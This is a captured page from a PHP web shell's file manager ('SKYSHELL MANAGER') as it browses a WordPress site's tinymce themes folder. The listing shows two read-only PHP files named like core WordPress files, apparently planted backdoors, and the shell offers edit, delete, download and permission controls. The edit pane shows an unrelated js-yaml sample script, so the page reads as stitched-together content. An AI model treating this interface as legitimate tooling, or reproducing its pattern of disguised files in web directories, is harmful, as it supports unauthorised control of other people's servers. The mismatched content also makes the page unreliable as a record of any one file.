📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: sample_document.js
'use strict'; /*eslint-disable no-console*/ var fs = require('fs'); var path = require('path'); var util = require('util'); var yaml = require('../'); try { var filename = path.join(__dirname, 'sample_document.yml'), contents = fs.readFileSync(filename, 'utf8'), data = yaml.load(contents); console.log(util.inspect(data, false, 10, true)); } catch (err) { console.log(err.stack || String(err)); }
Save